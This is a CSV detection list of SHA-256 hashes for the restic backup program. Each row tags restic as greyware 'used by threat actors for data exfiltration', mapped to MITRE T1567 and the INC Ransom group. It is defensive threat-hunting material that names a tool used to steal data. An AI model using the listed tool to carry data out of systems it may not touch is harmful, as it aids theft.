"*434d77b8079a27f303d30758ad99152abf3102095b6bb3573c1de307f1ab6345*",".{0,1000}434d77b8079a27f303d30758ad99152abf3102095b6bb3573c1de307f1ab6345.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*43836fc05af4c552cb500cdc87a6ca06a6fb0f6b8f179171f1a971aee0a4d6f7*",".{0,1000}43836fc05af4c552cb500cdc87a6ca06a6fb0f6b8f179171f1a971aee0a4d6f7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*43f13d70c3f9912a1ff1eac831c2c728b3864b332974fb57b0a33a4bba85487c*",".{0,1000}43f13d70c3f9912a1ff1eac831c2c728b3864b332974fb57b0a33a4bba85487c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*44ce3367b0b413ad48757de8e2a1f4e2c30137e7cdc77db64906f3eb7087b78f*",".{0,1000}44ce3367b0b413ad48757de8e2a1f4e2c30137e7cdc77db64906f3eb7087b78f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*452b0b0626412b439f83ad72cce7f280434fc690f4b4851417a759fc4d60392b*",".{0,1000}452b0b0626412b439f83ad72cce7f280434fc690f4b4851417a759fc4d60392b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*457676a918bae4371b312fcf6308578078d5c944758ff808307d9b416a98f68f*",".{0,1000}457676a918bae4371b312fcf6308578078d5c944758ff808307d9b416a98f68f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*459f93b1384a4a734787f259252959e88baaea1cb7b790a4f1779c4163efb1ed*",".{0,1000}459f93b1384a4a734787f259252959e88baaea1cb7b790a4f1779c4163efb1ed.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*466ccb2dcccfff96a199d4f84c05a0e80e932ba44d0f4de4b851f1b8180a7a4c*",".{0,1000}466ccb2dcccfff96a199d4f84c05a0e80e932ba44d0f4de4b851f1b8180a7a4c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*46d932ff5e5ca781fb01d313a56cf4087f27250fbdc0d7cb56fa958476bb8af8*",".{0,1000}46d932ff5e5ca781fb01d313a56cf4087f27250fbdc0d7cb56fa958476bb8af8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*46e430adf1e95bd73f253c42f270b1e2b209457cad4e45edae59ff6e87a27069*",".{0,1000}46e430adf1e95bd73f253c42f270b1e2b209457cad4e45edae59ff6e87a27069.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4743ea0bcead6c3d7e8444711f627c0ee495cb651d3490960ec8b6fb742ae9db*",".{0,1000}4743ea0bcead6c3d7e8444711f627c0ee495cb651d3490960ec8b6fb742ae9db.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*47740183a3e2ffdb4acc17a97456de9406f158ec4c964d9d6627fd6711032a86*",".{0,1000}47740183a3e2ffdb4acc17a97456de9406f158ec4c964d9d6627fd6711032a86.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*47ab8cf4c8a99b270634aae6b5bdbf49ba75aedc09ca04e0fd43a7be9108c27a*",".{0,1000}47ab8cf4c8a99b270634aae6b5bdbf49ba75aedc09ca04e0fd43a7be9108c27a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*47c3345b1bb58e7f984c41831bbc845f1c61a6add5cbf5b3a52a691c78e83c9a*",".{0,1000}47c3345b1bb58e7f984c41831bbc845f1c61a6add5cbf5b3a52a691c78e83c9a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*489b3873fd79e99feae45e5953ccca3fd21a84eb68a99654ca0a6ac1b2dcd255*",".{0,1000}489b3873fd79e99feae45e5953ccca3fd21a84eb68a99654ca0a6ac1b2dcd255.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*492387572bb2c4de904fa400636e05492e7200b331335743d46f2f2874150162*",".{0,1000}492387572bb2c4de904fa400636e05492e7200b331335743d46f2f2874150162.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*49a093e97e5091456452d7e8edc9450cb0028ba777b62711b209b9db12317cdd*",".{0,1000}49a093e97e5091456452d7e8edc9450cb0028ba777b62711b209b9db12317cdd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*49b63459ce22867bee13f2589aba38a51ed5bc728fd6f38f9ab107c7a4f00471*",".{0,1000}49b63459ce22867bee13f2589aba38a51ed5bc728fd6f38f9ab107c7a4f00471.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4acda13c308d3fd2b892ddf6fe210b8438c7a97abe88797315d06600fcfcbcc6*",".{0,1000}4acda13c308d3fd2b892ddf6fe210b8438c7a97abe88797315d06600fcfcbcc6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4ad8bca8939396f8a99252e096891b064472e3abd9b8fdd1b7c2e4c80cc74348*",".{0,1000}4ad8bca8939396f8a99252e096891b064472e3abd9b8fdd1b7c2e4c80cc74348.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4af2dc16619d3a9da05be6220a9b160433d5b0fc37bd6b679afbdd6e73a79a4f*",".{0,1000}4af2dc16619d3a9da05be6220a9b160433d5b0fc37bd6b679afbdd6e73a79a4f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4b2335364a62f3268581e6343b3b9243fa89ef6a48ca9b24ea2db1a949e91156*",".{0,1000}4b2335364a62f3268581e6343b3b9243fa89ef6a48ca9b24ea2db1a949e91156.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4b7c2e0e6e2491b55ca2bfc8d7198fa7e750afb8a5e779fa50623fa718fd7827*",".{0,1000}4b7c2e0e6e2491b55ca2bfc8d7198fa7e750afb8a5e779fa50623fa718fd7827.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4bcce7c204dc4ce408bfb2a127ff17294b845d435d6f5f3cb3ab6064d9d3188d*",".{0,1000}4bcce7c204dc4ce408bfb2a127ff17294b845d435d6f5f3cb3ab6064d9d3188d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4c908414d885dbe8b105b4c794931bcaf649a8184e1addda4785cef8307bc3e7*",".{0,1000}4c908414d885dbe8b105b4c794931bcaf649a8184e1addda4785cef8307bc3e7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4d9ec99ceec71df88f47c5ebae5fdd15474f7d36e9685a655830c2fc89ad9153*",".{0,1000}4d9ec99ceec71df88f47c5ebae5fdd15474f7d36e9685a655830c2fc89ad9153.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4e55db9ef3e258914860532610cc37db12e2f875f9bd8fd5b789c4a55f7b4f6c*",".{0,1000}4e55db9ef3e258914860532610cc37db12e2f875f9bd8fd5b789c4a55f7b4f6c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4e9929b68f2e9f3df50e4b320ee85357134efde38986d25983b8fcf50e19cd22*",".{0,1000}4e9929b68f2e9f3df50e4b320ee85357134efde38986d25983b8fcf50e19cd22.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4eb7ebda84217bc575fff510a5534f5750772915d6efa435a9ce49ef5eb0b075*",".{0,1000}4eb7ebda84217bc575fff510a5534f5750772915d6efa435a9ce49ef5eb0b075.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4ef3458f9635baf5cfd25a793486b612df7f4904c91eb2e4558d9713fcd34912*",".{0,1000}4ef3458f9635baf5cfd25a793486b612df7f4904c91eb2e4558d9713fcd34912.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4f3e5adb0523a6811d21570838c9f061b7c9bb01264be518d0ed55039ac42547*",".{0,1000}4f3e5adb0523a6811d21570838c9f061b7c9bb01264be518d0ed55039ac42547.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*4f8be171615906969f1393b450924f0afe3458ff88f7fb8be89f5c02837b4026*",".{0,1000}4f8be171615906969f1393b450924f0afe3458ff88f7fb8be89f5c02837b4026.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*50362f6c4c2d91cf0edc750c578b73605fdbb79443874110cc0a64913553f76b*",".{0,1000}50362f6c4c2d91cf0edc750c578b73605fdbb79443874110cc0a64913553f76b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*50a8e58ad1cda3eaabbd812d064b7cb40e7119b6c4838ef5c1c74b8f6db8a5cc*",".{0,1000}50a8e58ad1cda3eaabbd812d064b7cb40e7119b6c4838ef5c1c74b8f6db8a5cc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5129b1b4b402350d6a7ff85b511dc2c8c94148e8fdb25d57c368d47cbe5d6703*",".{0,1000}5129b1b4b402350d6a7ff85b511dc2c8c94148e8fdb25d57c368d47cbe5d6703.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*514d0711317427f45d3ca23e66cf66e9f98caef660314d843f59b38511e94a2c*",".{0,1000}514d0711317427f45d3ca23e66cf66e9f98caef660314d843f59b38511e94a2c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*527ddd722d4629f835321d6b8cb25f28d4b55fb7b7e946e95c1e2098b88f86ef*",".{0,1000}527ddd722d4629f835321d6b8cb25f28d4b55fb7b7e946e95c1e2098b88f86ef.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*52aca841486eaf4fe6422b059aa05bbf20db94b957de1d3fca019ed2af8192b7*",".{0,1000}52aca841486eaf4fe6422b059aa05bbf20db94b957de1d3fca019ed2af8192b7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*53774723cd9aa6a4a815ad002dd8be8535611237463240767ef3821f0d9e14b4*",".{0,1000}53774723cd9aa6a4a815ad002dd8be8535611237463240767ef3821f0d9e14b4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*53b7392e1f6973680579aa054458531886ef6d359868bcb2a4a52f7ffa5cf8f3*",".{0,1000}53b7392e1f6973680579aa054458531886ef6d359868bcb2a4a52f7ffa5cf8f3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*53ce7b5352a21cee0659ff9fbe71cd553cce35e1f72cb5db10975263fccebd47*",".{0,1000}53ce7b5352a21cee0659ff9fbe71cd553cce35e1f72cb5db10975263fccebd47.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*53d0b11932ca6402d75e8ace78625dac6599573d8e783001faf161dc8bccf063*",".{0,1000}53d0b11932ca6402d75e8ace78625dac6599573d8e783001faf161dc8bccf063.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*53f3f97e369c874277a38fec36f2d533a865ad22c4ff8f06e4335f682c36b65a*",".{0,1000}53f3f97e369c874277a38fec36f2d533a865ad22c4ff8f06e4335f682c36b65a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*542fd8635fa9784837b4adc0baf96ec514ed347c30603db9bc953ecce68399e4*",".{0,1000}542fd8635fa9784837b4adc0baf96ec514ed347c30603db9bc953ecce68399e4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*57384f36febc695b32b0fd2910643ddaad6770898cf63a9f97a2f76e9faed5a8*",".{0,1000}57384f36febc695b32b0fd2910643ddaad6770898cf63a9f97a2f76e9faed5a8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*574aeb6cb673aa96cab6fa82656126f1ece4079edf89f68de09a3fce708ad47e*",".{0,1000}574aeb6cb673aa96cab6fa82656126f1ece4079edf89f68de09a3fce708ad47e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*57556703267587c0017816c99be4a8a9b7ddead80a45dfce31b2fdab2a0304a5*",".{0,1000}57556703267587c0017816c99be4a8a9b7ddead80a45dfce31b2fdab2a0304a5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*575a6a7a4c23274aefb4eff8c0614036cc1999f108142741ce5296e4ce00811b*",".{0,1000}575a6a7a4c23274aefb4eff8c0614036cc1999f108142741ce5296e4ce00811b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5785f21245163c072e0f3acc39f86e5d105bf54c0245bbfcba5d2d21d1d6f301*",".{0,1000}5785f21245163c072e0f3acc39f86e5d105bf54c0245bbfcba5d2d21d1d6f301.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*57b5c5dbb54b9438aec465b9112ff4936876172c09f35746ddaa8792b52eb347*",".{0,1000}57b5c5dbb54b9438aec465b9112ff4936876172c09f35746ddaa8792b52eb347.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*58170b311be68a8149d51edce1c837bc1feb49b0f6b95b64a0bf76c2a7820a52*",".{0,1000}58170b311be68a8149d51edce1c837bc1feb49b0f6b95b64a0bf76c2a7820a52.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*581f25669bf62fbf90100987fc62d36c31e6781f1dd89e155e45e79c17fda0bf*",".{0,1000}581f25669bf62fbf90100987fc62d36c31e6781f1dd89e155e45e79c17fda0bf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5828751f5c11d3f77fbae66a616adf3a46fe1e09c130d282830597718769b869*",".{0,1000}5828751f5c11d3f77fbae66a616adf3a46fe1e09c130d282830597718769b869.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*58a1d3e8d51cc32760153418672a3a0a7d81b2996895fa533614842ca0a75c98*",".{0,1000}58a1d3e8d51cc32760153418672a3a0a7d81b2996895fa533614842ca0a75c98.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5ad984e4bc9cf2b67a414f99c48b2f5621b12efaa1c838e4a6a13a7333641dc7*",".{0,1000}5ad984e4bc9cf2b67a414f99c48b2f5621b12efaa1c838e4a6a13a7333641dc7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5b46612254dcaec09a6f7ddae70e116f77c0f87ac7988dc379b34d0fd4bbc4c4*",".{0,1000}5b46612254dcaec09a6f7ddae70e116f77c0f87ac7988dc379b34d0fd4bbc4c4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5b94b821a76615c0557b5c98c66253e72f86a1b1ed18c908cf370b603fa10c3f*",".{0,1000}5b94b821a76615c0557b5c98c66253e72f86a1b1ed18c908cf370b603fa10c3f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5be16e35f6b1f8339af50531e3c165d3287f2bba9d1ad27a9c4e601364a0eb5c*",".{0,1000}5be16e35f6b1f8339af50531e3c165d3287f2bba9d1ad27a9c4e601364a0eb5c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5bf8796898cefcaced122d5188653d74ccf4412a3686f84cbcc312ebc1bd74ea*",".{0,1000}5bf8796898cefcaced122d5188653d74ccf4412a3686f84cbcc312ebc1bd74ea.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5bfc3639ab04d2456ed2e69be163a1b0734f14518b46ab711bac4c23e74585b0*",".{0,1000}5bfc3639ab04d2456ed2e69be163a1b0734f14518b46ab711bac4c23e74585b0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5c0f7d058401e664d0c6f244a0c928a8cc4dcf4db038896118f7b94e35cc6c46*",".{0,1000}5c0f7d058401e664d0c6f244a0c928a8cc4dcf4db038896118f7b94e35cc6c46.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5d86a4eb9a7178bb95ce83bf687929a433c9a4aaa2ba92b6330b393709acf745*",".{0,1000}5d86a4eb9a7178bb95ce83bf687929a433c9a4aaa2ba92b6330b393709acf745.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5dc863dba915a904465b9da951175ecc957fe3e016d1a026b3688a5c1cfadd80*",".{0,1000}5dc863dba915a904465b9da951175ecc957fe3e016d1a026b3688a5c1cfadd80.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
